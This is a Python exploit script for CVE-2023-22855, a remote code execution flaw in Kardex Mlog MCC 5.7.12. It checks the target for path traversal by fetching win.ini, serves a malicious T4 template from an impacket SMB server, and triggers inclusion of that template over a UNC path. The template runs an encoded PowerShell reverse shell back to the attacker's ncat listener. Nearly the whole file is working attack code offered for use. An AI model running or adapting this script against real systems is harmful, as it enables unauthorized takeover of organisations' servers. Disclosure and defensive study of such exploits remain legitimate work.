#!/usr/bin/env python3
# Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)
# Date: 12/13/2022
# Exploit Author: Patrick Hener
# Vendor Homepage: https://www.kardex.com/en/mlog-control-center
# Version: 5.7.12+0-a203c2a213-master
# Tested on: Windows Server 2016
# CVE : CVE-2023-22855
# Writeup: https://hesec.de/posts/CVE-2023-22855
#
# You will need to run a netcat listener beforehand: ncat -lnvp <port>
#
import requests, argparse, base64, os, threading
from impacket import smbserver
def probe(target):
headers = {
"Accept-Encoding": "deflate"
}
res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers)
if "fonts" in res.text:
return True
else:
return False
def gen_payload(lhost, lport):
rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'
rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE'))
payload = f"""<#@ template language="C#" #>
<#@ Import Namespace="System" #>
<#@ Import Namespace="System.Diagnostics" #>
<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e {rev_shell_blob_b64.decode()}";
proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#>"""
return payload
def start_smb_server(lhost):
server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
server.addShare("SHARE", os.getcwd(), '')
server.setSMB2Support(True)
server.setSMBChallenge('')
server.start()
def trigger_vulnerability(target, lhost):
headers = {
"Accept-Encoding": "deflate"
}
requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers)
def main():
# Well, args
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', help='Target host url', required=True)
parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True)
parser.add_argument('-p', '--lport', help='Attacker listening port', required=True)
args = parser.parse_args()
# Probe if target is vulnerable
print("[*] Probing target")
if probe(args.target):
print("[+] Target is alive and File Inclusion working")
else:
print("[-] Target is not alive or File Inclusion not working")
exit(-1)
# Write payload to file
print("[*] Writing 'exploit.t4' payload to be included later on")
with open("exploit.t4", 'w') as template:
template.write(gen_payload(args.lhost, args.lport))
template.close()
# Start smb server in background
print("[*] Starting SMB Server in the background")
smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,))
smb_server_thread.start()
# Rev Shell reminder
print("[!] At this point you should have spawned a rev shell listener")
print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'")
print("[?] Are you ready to trigger the vuln? Then press enter!")
input() # Wait for input then continue
# Trigger vulnerability
print("[*] Now triggering the vulnerability")
trigger_vulnerability(args.target, args.lhost)
# Exit
print("[+] Enjoy your shell. Bye!")
os._exit(1)
if __name__ == "__main__":
main()